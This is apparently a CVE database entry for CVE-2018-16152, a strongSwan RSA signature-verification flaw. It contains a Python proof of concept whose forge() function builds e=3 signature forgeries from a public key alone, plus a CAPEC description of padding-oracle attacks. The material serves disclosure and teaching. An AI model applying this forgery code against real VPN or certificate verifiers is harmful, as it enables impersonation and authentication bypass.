ID CVE-2018-16152
Summary In verify_emsa_pkcs1_signature() in gmp_rsa_public_key.c in the gmp plugin in strongSwan 4.x and 5.x before 5.7.0, the RSA implementation based on GMP does not reject excess data in the digestAlgorithm.parameters field during PKCS#1 v1.5 signature verification. Consequently, a remote attacker can forge signatures when small public exponents are being used, which could lead to impersonation when only an RSA signature is used for IKEv2 authentication. This is a variant of CVE-2006-4790 and CVE-2014-1568.
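Worked example, added here and not code from this page, from strongSwan or from the researchers who reported the issue: a PKCS#1 v1.5 verifier in two flavours, one that accepts any well-formed ASN.1 element in digestAlgorithm.parameters (a model of the pre-5.7.0 gmp behaviour described in the summary), and one that accepts only absent or NULL parameters, together with the public-key-only forgery that the lenient flavour lets through when e = 3. The forged EM places the cube's slack in an OCTET STRING inside the parameters field, before the hash, so the low bits are pinned with a cube root modulo 2^t and the high bits with an integer cube root; both verifiers reject bytes after DigestInfo, which is the distinction the Debian advisory text further down draws between this bug and the original 2006 attack. Everything concrete is constructed for the demo and is an assumption of the example rather than a fact from the page: the 2048-bit e = 3 key, the messages, SHA-256 as the only digest, the minimum of eight 0xFF padding bytes, and the names verify, forge and demo.

```python
import hashlib, secrets
# Added example, not strongSwan code: the key, the messages and the forged-EM layout are constructed for the demo.
SHA256_OID = bytes.fromhex("0609608648016503040201")  # DER OID 2.16.840.1.101.3.4.2.1 (sha256) as used in DigestInfo
SMALL_PRIMES = [p for p in range(3, 2000, 2) if all(p % q for q in range(3, int(p ** 0.5) + 1, 2))]

def is_probable_prime(n, rounds=24):  # trial division by small primes, then Miller-Rabin with random bases
    if any(n % p == 0 for p in SMALL_PRIMES):
        return False
    r = ((n - 1) & (1 - n)).bit_length() - 1  # n - 1 = d * 2^r with d odd
    d = (n - 1) >> r
    for _ in range(rounds):
        x = pow(secrets.randbelow(n - 3) + 2, d, n)
        if x in (1, n - 1): continue
        for _ in range(r - 1):
            x = x * x % n
            if x == n - 1: break
        else: return False
    return True

def gen_rsa_e3(bits=2048):  # demo key with e = 3; primes are 2 (mod 3) so that 3 is invertible modulo phi(n)
    def prime():
        while True:
            p = secrets.randbits(bits // 2) | 1 << (bits // 2 - 1) | 1
            if p % 3 == 2 and is_probable_prime(p):
                return p
    p, q = prime(), prime()
    return p * q, 3, pow(3, -1, (p - 1) * (q - 1))

def der(tag, content):  # encode one DER TLV with definite (short or long form) length
    n = len(content)
    lb = b"" if n < 0x80 else n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, n if n < 0x80 else 0x80 | len(lb)]) + lb + content

def tlv(buf, pos):  # decode the TLV at pos -> (tag, value, end); raises if malformed or truncated
    tag, first = buf[pos], buf[pos + 1]
    k = first & 0x7F if first & 0x80 else 0  # long form: number of length bytes; short form: 0
    n = first if k == 0 else int.from_bytes(buf[pos + 2:pos + 2 + k], "big")
    if first == 0x80 or k > 4 or pos + 2 + k + n > len(buf):
        raise ValueError("malformed or truncated TLV")
    return tag, buf[pos + 2 + k:pos + 2 + k + n], pos + 2 + k + n

def sign(msg, n, d):  # honest signer: DigestInfo with NULL parameters, EM = 00 01 FF..FF 00 || DigestInfo
    t = der(0x30, der(0x30, SHA256_OID + b"\x05\x00") + der(0x04, hashlib.sha256(msg).digest()))
    return pow(int.from_bytes(b"\x00\x01" + b"\xff" * ((n.bit_length() + 7) // 8 - len(t) - 3) + b"\x00" + t, "big"), d, n)

def verify(msg, sig, n, e, strict):
    """PKCS#1 v1.5/SHA-256 check; strict=False takes any one well-formed element as digestAlgorithm.parameters (pre-5.7.0 gmp), strict=True only absent or NULL."""
    k = (n.bit_length() + 7) // 8
    em = pow(sig, e, n).to_bytes(k, "big")
    i = next((j for j in range(2, k) if em[j] != 0xFF), k)  # end of the FF padding
    if em[:2] != b"\x00\x01" or i < 10 or i >= k or em[i] != 0x00:  # at least 8 FF bytes, then the 00 separator
        return False
    try:
        tag, di, end = tlv(em, i + 1)  # end != k would mean trailing bytes after DigestInfo: rejected below
        tag2, algid, pos = tlv(di, 0)
        tag3, hsh, end2 = tlv(di, pos)
        if (tag, tag2, tag3) != (0x30, 0x30, 0x04) or end != k or end2 != len(di) or not algid.startswith(SHA256_OID):
            return False
        params = algid[len(SHA256_OID):]
        if strict:
            ok = params in (b"", b"\x05\x00")
        else:
            ok = not params or tlv(params, 0)[2] == len(params)  # the bug: tag and content are never checked
    except (ValueError, IndexError):
        return False
    return ok and hsh == hashlib.sha256(msg).digest()

def icbrt(x):  # floor(cbrt(x)) for x > 0 by integer Newton iteration
    r = 1 << ((x.bit_length() + 2) // 3)
    while (nr := (2 * r + x // (r * r)) // 3) < r:
        r = nr
    return r

def forge(msg, n):
    """Forge an e=3 signature over msg from the public modulus alone. Forged EM: 00 01 FF*8 00 SEQ{ SEQ{ OID, OCTET STRING <free bytes> }, OCTET STRING hash }.
    s is built so that s^3 < n, s^3 reproduces the fixed prefix and the hash suffix, and the cube's slack lands in the free bytes."""
    k = (n.bit_length() + 7) // 8
    suffix = der(0x04, hashlib.sha256(msg).digest())
    if suffix[-1] % 2 == 0:
        raise ValueError("hash must end in an odd byte; pick another message")
    def layout(g):  # the forged EM with g zero bytes in the parameters field
        return b"\x00\x01" + b"\xff" * 8 + b"\x00" + der(0x30, der(0x30, SHA256_OID + der(0x04, bytes(g))) + suffix)
    g = next(g for g in range(k, 0, -1) if len(layout(g)) == k)
    t = 8 * len(suffix)
    target = int.from_bytes(layout(g), "big") | 1 << (8 * g + t - 1)  # aim at the middle of the free region
    s_hi = icbrt(target) + 1  # s_hi^3 - target < 3*s_hi^2 + 3*s_hi + 1: still inside the free region
    s_lo = pow(int.from_bytes(suffix, "big"), pow(3, -1, 1 << (t - 2)), 1 << t)  # odd cube root mod 2^t
    return (s_hi >> t << t) | s_lo  # low t bits of s^3 equal the suffix; the change (< 3*s^2*2^t) stays in the free bytes

def demo():  # honest signature must pass both verifiers; the forgery must pass only the lenient one
    n, e, d = gen_rsa_e3()
    honest = b"IKE_AUTH octets signed by the real gateway"
    sig = sign(honest, n, d)
    # the modular cube root needs an odd suffix: bump a counter until SHA-256 ends in an odd byte
    target = next(m for m in (b"IKE_AUTH octets chosen by the impersonator #%d" % i for i in range(256)) if hashlib.sha256(m).digest()[-1] & 1)
    forged = forge(target, n)
    return {"honest_strict": verify(honest, sig, n, e, True), "honest_lenient": verify(honest, sig, n, e, False),
            "forged_lenient": verify(target, forged, n, e, False), "forged_strict": verify(target, forged, n, e, True),
            "no_reduction": forged ** 3 < n}
```

demo() returns True for the honest signature under both verifiers, True for the forgery under the lenient one and False under the strict one, and confirms that the forged value cubes to less than n, so the verifier's modular exponentiation never wraps and the attacker needs nothing but the public key. The construction only closes when the free region is large relative to the hash, which is why e = 3 with a 2048-bit modulus is the realistic target. The durable remedy is the one RFC 8017 section 8.2.2 prescribes for RSASSA-PKCS1-v1_5: build the expected EM from the message and compare it byte for byte instead of parsing the recovered one, so that neither trailing bytes nor non-NULL parameters can be smuggled in.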
Vulnerable Configurations
  • StrongSwan strongSwan 4.0.0
    cpe:2.3:a:strongswan:strongswan:4.0.0
  • StrongSwan strongSwan 4.0.1
    cpe:2.3:a:strongswan:strongswan:4.0.1
  • StrongSwan strongSwan 4.0.2
    cpe:2.3:a:strongswan:strongswan:4.0.2
  • StrongSwan strongSwan 4.0.3
    cpe:2.3:a:strongswan:strongswan:4.0.3
  • StrongSwan strongSwan 4.0.4
    cpe:2.3:a:strongswan:strongswan:4.0.4
  • StrongSwan strongSwan 4.0.5
    cpe:2.3:a:strongswan:strongswan:4.0.5
  • StrongSwan strongSwan 4.0.6
    cpe:2.3:a:strongswan:strongswan:4.0.6
  • StrongSwan strongSwan 4.0.7
    cpe:2.3:a:strongswan:strongswan:4.0.7
  • StrongSwan strongSwan 4.1.0
    cpe:2.3:a:strongswan:strongswan:4.1.0
  • StrongSwan strongSwan 4.1.1
    cpe:2.3:a:strongswan:strongswan:4.1.1
  • StrongSwan strongSwan 4.1.2
    cpe:2.3:a:strongswan:strongswan:4.1.2
  • StrongSwan strongSwan 4.1.3
    cpe:2.3:a:strongswan:strongswan:4.1.3
  • StrongSwan strongSwan 4.1.4
    cpe:2.3:a:strongswan:strongswan:4.1.4
  • StrongSwan strongSwan 4.1.5
    cpe:2.3:a:strongswan:strongswan:4.1.5
  • StrongSwan strongSwan 4.1.6
    cpe:2.3:a:strongswan:strongswan:4.1.6
  • StrongSwan strongSwan 4.1.7
    cpe:2.3:a:strongswan:strongswan:4.1.7
  • StrongSwan strongSwan 4.1.8
    cpe:2.3:a:strongswan:strongswan:4.1.8
  • StrongSwan strongSwan 4.1.9
    cpe:2.3:a:strongswan:strongswan:4.1.9
  • StrongSwan strongSwan 4.1.10
    cpe:2.3:a:strongswan:strongswan:4.1.10
  • StrongSwan strongSwan 4.1.11
    cpe:2.3:a:strongswan:strongswan:4.1.11
  • StrongSwan strongSwan 4.2.0
    cpe:2.3:a:strongswan:strongswan:4.2.0
  • StrongSwan strongSwan 4.2.1
    cpe:2.3:a:strongswan:strongswan:4.2.1
  • StrongSwan strongSwan 4.2.2
    cpe:2.3:a:strongswan:strongswan:4.2.2
  • StrongSwan strongSwan 4.2.3
    cpe:2.3:a:strongswan:strongswan:4.2.3
  • StrongSwan strongSwan 4.2.4
    cpe:2.3:a:strongswan:strongswan:4.2.4
  • StrongSwan strongSwan 4.2.5
    cpe:2.3:a:strongswan:strongswan:4.2.5
  • StrongSwan strongSwan 4.2.6
    cpe:2.3:a:strongswan:strongswan:4.2.6
  • StrongSwan strongSwan 4.2.7
    cpe:2.3:a:strongswan:strongswan:4.2.7
  • StrongSwan strongSwan 4.2.8
    cpe:2.3:a:strongswan:strongswan:4.2.8
  • StrongSwan strongSwan 4.2.9
    cpe:2.3:a:strongswan:strongswan:4.2.9
  • StrongSwan strongSwan 4.2.10
    cpe:2.3:a:strongswan:strongswan:4.2.10
  • StrongSwan strongSwan 4.2.11
    cpe:2.3:a:strongswan:strongswan:4.2.11
  • StrongSwan strongSwan 4.2.12
    cpe:2.3:a:strongswan:strongswan:4.2.12
  • StrongSwan strongSwan 4.2.13
    cpe:2.3:a:strongswan:strongswan:4.2.13
  • StrongSwan strongSwan 4.2.14
    cpe:2.3:a:strongswan:strongswan:4.2.14
  • StrongSwan strongSwan 4.2.15
    cpe:2.3:a:strongswan:strongswan:4.2.15
  • StrongSwan strongSwan 4.2.16
    cpe:2.3:a:strongswan:strongswan:4.2.16
  • StrongSwan strongSwan 4.3.0
    cpe:2.3:a:strongswan:strongswan:4.3.0
  • StrongSwan strongSwan 4.3.1
    cpe:2.3:a:strongswan:strongswan:4.3.1
  • StrongSwan strongSwan 4.3.2
    cpe:2.3:a:strongswan:strongswan:4.3.2
  • StrongSwan strongSwan 4.3.3
    cpe:2.3:a:strongswan:strongswan:4.3.3
  • StrongSwan strongSwan 4.3.4
    cpe:2.3:a:strongswan:strongswan:4.3.4
  • StrongSwan 4.3.5
    cpe:2.3:a:strongswan:strongswan:4.3.5
  • StrongSwan 4.3.6
    cpe:2.3:a:strongswan:strongswan:4.3.6
  • StrongSwan 4.3.7
    cpe:2.3:a:strongswan:strongswan:4.3.7
  • StrongSwan 4.4.0
    cpe:2.3:a:strongswan:strongswan:4.4.0
  • StrongSwan strongSwan 4.4.1
    cpe:2.3:a:strongswan:strongswan:4.4.1
  • StrongSwan strongSwan 4.5.0
    cpe:2.3:a:strongswan:strongswan:4.5.0
  • StrongSwan strongSwan 4.5.1
    cpe:2.3:a:strongswan:strongswan:4.5.1
  • StrongSwan strongSwan 4.5.2
    cpe:2.3:a:strongswan:strongswan:4.5.2
  • StrongSwan strongSwan 4.5.3
    cpe:2.3:a:strongswan:strongswan:4.5.3
  • StrongSwan strongSwan 4.6.0
    cpe:2.3:a:strongswan:strongswan:4.6.0
  • StrongSwan strongSwan 4.6.1
    cpe:2.3:a:strongswan:strongswan:4.6.1
  • StrongSwan strongSwan 4.6.2
    cpe:2.3:a:strongswan:strongswan:4.6.2
  • StrongSwan strongSwan 4.6.3
    cpe:2.3:a:strongswan:strongswan:4.6.3
  • StrongSwan 4.6.4
    cpe:2.3:a:strongswan:strongswan:4.6.4
  • StrongSwan 5.0.0
    cpe:2.3:a:strongswan:strongswan:5.0.0
  • StrongSwan 5.0.1
    cpe:2.3:a:strongswan:strongswan:5.0.1
  • StrongSwan 5.0.2
    cpe:2.3:a:strongswan:strongswan:5.0.2
  • StrongSwan 5.0.3
    cpe:2.3:a:strongswan:strongswan:5.0.3
  • StrongSwan 5.0.4
    cpe:2.3:a:strongswan:strongswan:5.0.4
  • StrongSwan strongSwan 5.1.0
    cpe:2.3:a:strongswan:strongswan:5.1.0
  • StrongSwan strongSwan 5.1.1
    cpe:2.3:a:strongswan:strongswan:5.1.1
  • StrongSwan strongSwan 5.1.2
    cpe:2.3:a:strongswan:strongswan:5.1.2
  • StrongSwan strongSwan 5.1.3
    cpe:2.3:a:strongswan:strongswan:5.1.3
  • StrongSwan 5.2.0
    cpe:2.3:a:strongswan:strongswan:5.2.0
  • strongSwan 5.2.1
    cpe:2.3:a:strongswan:strongswan:5.2.1
  • strongSwan 5.2.2
    cpe:2.3:a:strongswan:strongswan:5.2.2
  • strongSwan 5.2.3
    cpe:2.3:a:strongswan:strongswan:5.2.3
  • strongSwan 5.3.0
    cpe:2.3:a:strongswan:strongswan:5.3.0
  • strongSwan 5.3.1
    cpe:2.3:a:strongswan:strongswan:5.3.1
  • StrongSwan strongSwan 5.3.2
    cpe:2.3:a:strongswan:strongswan:5.3.2
  • StrongSwan strongSwan 5.3.3
    cpe:2.3:a:strongswan:strongswan:5.3.3
  • strongSwan 5.3.4
    cpe:2.3:a:strongswan:strongswan:5.3.4
  • strongSwan 5.3.5
    cpe:2.3:a:strongswan:strongswan:5.3.5
  • strongSwan 5.4.0
    cpe:2.3:a:strongswan:strongswan:5.4.0
  • strongSwan 5.5.0
    cpe:2.3:a:strongswan:strongswan:5.5.0
  • strongSwan 5.5.1
    cpe:2.3:a:strongswan:strongswan:5.5.1
  • strongSwan 5.5.2
    cpe:2.3:a:strongswan:strongswan:5.5.2
  • strongSwan 5.5.3
    cpe:2.3:a:strongswan:strongswan:5.5.3
  • strongSwan 5.6.0
    cpe:2.3:a:strongswan:strongswan:5.6.0
  • strongSwan 5.6.1
    cpe:2.3:a:strongswan:strongswan:5.6.1
  • strongSwan 5.6.2
    cpe:2.3:a:strongswan:strongswan:5.6.2
  • strongSwan 5.6.3
    cpe:2.3:a:strongswan:strongswan:5.6.3
  • Debian Linux 8.0 (Jessie)
    cpe:2.3:o:debian:debian_linux:8.0
  • Debian Linux 9.0
    cpe:2.3:o:debian:debian_linux:9.0
  • Canonical Ubuntu Linux 14.04 LTS (Long-Term Support)
    cpe:2.3:o:canonical:ubuntu_linux:14.04:-:-:-:lts
  • Canonical Ubuntu Linux 16.04 LTS (Long-Term Support)
    cpe:2.3:o:canonical:ubuntu_linux:16.04:-:-:-:lts
  • Canonical Ubuntu Linux 18.04 LTS Edition
    cpe:2.3:o:canonical:ubuntu_linux:18.04:-:-:-:lts
CVSS
Base: 5.0
CWE CWE-347
CAPEC
  • Padding Oracle Crypto Attack
    (Generic mapping inherited from CWE-347; it does not describe this issue. CVE-2018-16152 is an offline low-exponent signature forgery of the 2006 Bleichenbacher kind: the attacker computes the forged value from the public key alone, queries no oracle and decrypts nothing.)
    An attacker is able to efficiently decrypt data without knowing the decryption key if a target system leaks data on whether or not a padding error happened while decrypting the ciphertext. A target system that leaks this type of information becomes the padding oracle and an attacker is able to make use of that oracle to efficiently decrypt data without knowing the decryption key by issuing on average 128*b calls to the padding oracle (where b is the number of bytes in the ciphertext block). In addition to performing decryption, an attacker is also able to produce valid ciphertexts (i.e., perform encryption) by using the padding oracle, all without knowing the encryption key. Any cryptosystem can be vulnerable to padding oracle attacks if the encrypted messages are not authenticated to ensure their validity prior to decryption, and then the information about padding error is leaked to the attacker. This attack technique may be used, for instance, to break CAPTCHA systems or decrypt/modify state information stored in client side objects (e.g., hidden fields or cookies). This attack technique is a side-channel attack on the cryptosystem that uses a data leak from an improperly implemented decryption routine to completely subvert the cryptosystem. The one bit of information that tells the attacker whether a padding error during decryption has occurred, in whatever form it comes, is sufficient for the attacker to break the cryptosystem. That bit of information can come in the form of an explicit error message about a padding error, a returned blank page, or even the server taking longer to respond (a timing attack). This attack can be launched cross domain where an attacker is able to use cross-domain information leaks to get the bits of information from the padding oracle from a target system / service with which the victim is communicating. To do so an attacker sends a request containing ciphertext to the target system.
    Due to the browser's same origin policy, the attacker is not able to see the response directly, but can use cross-domain information leak techniques to still get the information needed (i.e., information on whether or not a padding error has occurred). For instance, this can be done using "img" tag plus the onerror()/onload() events. The attacker's JavaScript can make web browsers load an image on the target site, and know if the image is loaded or not. This is the 1 bit of information needed for the padding oracle attack to work: if the image is loaded, then it is valid padding, otherwise it is not.
nessus via4
  • NASL family Ubuntu Local Security Checks
    NASL id UBUNTU_USN-3771-1.NASL
    description It was discovered that strongSwan incorrectly handled IKEv2 key derivation. A remote attacker could possibly use this issue to cause strongSwan to crash, resulting in a denial of service. (CVE-2018-10811) Sze Yiu Chau discovered that strongSwan incorrectly handled parsing OIDs in the gmp plugin. A remote attacker could possibly use this issue to bypass authorization. (CVE-2018-16151) Sze Yiu Chau discovered that strongSwan incorrectly handled certain parameters fields in the gmp plugin. A remote attacker could possibly use this issue to bypass authorization. (CVE-2018-16152) It was discovered that strongSwan incorrectly handled the stroke plugin. A local administrator could use this issue to cause a denial of service, or possibly execute arbitrary code. (CVE-2018-5388). Note that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen 2019-02-21
    modified 2018-12-01
    plugin id 117805
    published 2018-09-27
    reporter Tenable
    source https://www.tenable.com/plugins/index.php?view=single&id=117805
    title Ubuntu 14.04 LTS / 16.04 LTS / 18.04 LTS : strongswan vulnerabilities (USN-3771-1)
  • NASL family Debian Local Security Checks
    NASL id DEBIAN_DSA-4305.NASL
    description Sze Yiu Chau and his team from Purdue University and The University of Iowa found several issues in the gmp plugin for strongSwan, an IKE/IPsec suite. Problems in the parsing and verification of RSA signatures could lead to a Bleichenbacher-style low-exponent signature forgery in certificates and during IKE authentication. While the gmp plugin doesn't allow arbitrary data after the ASN.1 structure (the original Bleichenbacher attack), the ASN.1 parser is not strict enough and allows data in specific fields inside the ASN.1 structure. Only installations using the gmp plugin are affected (on Debian the OpenSSL plugin has priority over the GMP one for RSA operations), and only when using keys and certificates (including ones from CAs) with an exponent e = 3, which is usually rare in practice.
      - CVE-2018-16151: The OID parser in the ASN.1 code in gmp allows any number of random bytes after a valid OID.
      - CVE-2018-16152: The algorithmIdentifier parser in the ASN.1 code in gmp doesn't enforce a NULL value for the optional parameter, which is not used with any PKCS#1 algorithm.
    last seen 2019-02-21
    modified 2018-12-20
    plugin id 117678
    published 2018-09-25
    reporter Tenable
    source https://www.tenable.com/plugins/index.php?view=single&id=117678
    title Debian DSA-4305-1 : strongswan - security update
  • NASL family Gentoo Local Security Checks
    NASL id GENTOO_GLSA-201811-16.NASL
    description The remote host is affected by the vulnerability described in GLSA-201811-16 (strongSwan: Multiple vulnerabilities) Multiple vulnerabilities have been discovered in strongSwan. Please review the CVE identifiers referenced below for details. Impact : A remote attacker could cause a Denial of Service condition or impersonate a user. Workaround : There is no known workaround at this time.
    last seen 2019-02-21
    modified 2018-11-27
    plugin id 119161
    published 2018-11-27
    reporter Tenable
    source https://www.tenable.com/plugins/index.php?view=single&id=119161
    title GLSA-201811-16 : strongSwan: Multiple vulnerabilities
  • NASL family PhotonOS Local Security Checks
    NASL id PHOTONOS_PHSA-2019-1_0-0203_STRONGSWAN.NASL
    description An update of the strongswan package has been released.
    last seen 2019-02-08
    modified 2019-02-07
    plugin id 122019
    published 2019-02-07
    reporter Tenable
    source https://www.tenable.com/plugins/index.php?view=single&id=122019
    title Photon OS 1.0: Strongswan PHSA-2019-1.0-0203
  • NASL family Debian Local Security Checks
    NASL id DEBIAN_DLA-1522.NASL
    description Sze Yiu Chau and his team from Purdue University and The University of Iowa found several security issues in the gmp plugin for strongSwan, an IKE/IPsec suite.
      - CVE-2018-16151: The OID parser in the ASN.1 code in gmp allows any number of random bytes after a valid OID.
      - CVE-2018-16152: The algorithmIdentifier parser in the ASN.1 code in gmp doesn't enforce a NULL value for the optional parameter, which is not used with any PKCS#1 algorithm.
    For Debian 8 'Jessie', these problems have been fixed in version 5.2.1-6+deb8u7. We recommend that you upgrade your strongswan packages. NOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen 2019-02-21
    modified 2018-12-20
    plugin id 117715
    published 2018-09-27
    reporter Tenable
    source https://www.tenable.com/plugins/index.php?view=single&id=117715
    title Debian DLA-1522-1 : strongswan security update
  • NASL family PhotonOS Local Security Checks
    NASL id PHOTONOS_PHSA-2019-2_0-0125_STRONGSWAN.NASL
    description An update of the strongswan package has been released.
    last seen 2019-02-08
    modified 2019-02-07
    plugin id 122028
    published 2019-02-07
    reporter Tenable
    source https://www.tenable.com/plugins/index.php?view=single&id=122028
    title Photon OS 2.0: Strongswan PHSA-2019-2.0-0125
  • NASL family Fedora Local Security Checks
    NASL id FEDORA_2018-61DF554BB1.NASL
    description Updated to release 5.7.1. Security fix for CVE-2018-16151 and CVE-2018-16152. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
    last seen 2019-02-21
    modified 2019-01-03
    plugin id 120469
    published 2019-01-03
    reporter Tenable
    source https://www.tenable.com/plugins/index.php?view=single&id=120469
    title Fedora 28 : strongswan (2018-61df554bb1)
  • NASL family Fedora Local Security Checks
    NASL id FEDORA_2018-9CAA6528D2.NASL
    description Updated to release 5.7.1. Security fix for CVE-2018-16151 and CVE-2018-16152.
    last seen 2019-02-21
    modified 2018-12-20
    plugin id 118123
    published 2018-10-16
    reporter Tenable
    source https://www.tenable.com/plugins/index.php?view=single&id=118123
    title Fedora 27 : strongswan (2018-9caa6528d2)
  • NASL family Fedora Local Security Checks
    NASL id FEDORA_2018-A0D22C2A21.NASL
    description Updated to release 5.7.1. Security fix for CVE-2018-16151 and CVE-2018-16152.
    last seen 2019-02-21
    modified 2019-01-03
    plugin id 120663
    published 2019-01-03
    reporter Tenable
    source https://www.tenable.com/plugins/index.php?view=single&id=120663
    title Fedora 29 : strongswan (2018-a0d22c2a21)
refmap via4
confirm https://www.strongswan.org/blog/2018/09/24/strongswan-vulnerability-(cve-2018-16151,-cve-2018-16152).html
debian DSA-4305
gentoo GLSA-201811-16
mlist [debian-lts-announce] 20180926 [SECURITY] [DLA 1522-1] strongswan security update
ubuntu USN-3771-1
Last major update 26-09-2018 - 17:29
Published 26-09-2018 - 17:29
Last modified 19-12-2018 - 13:49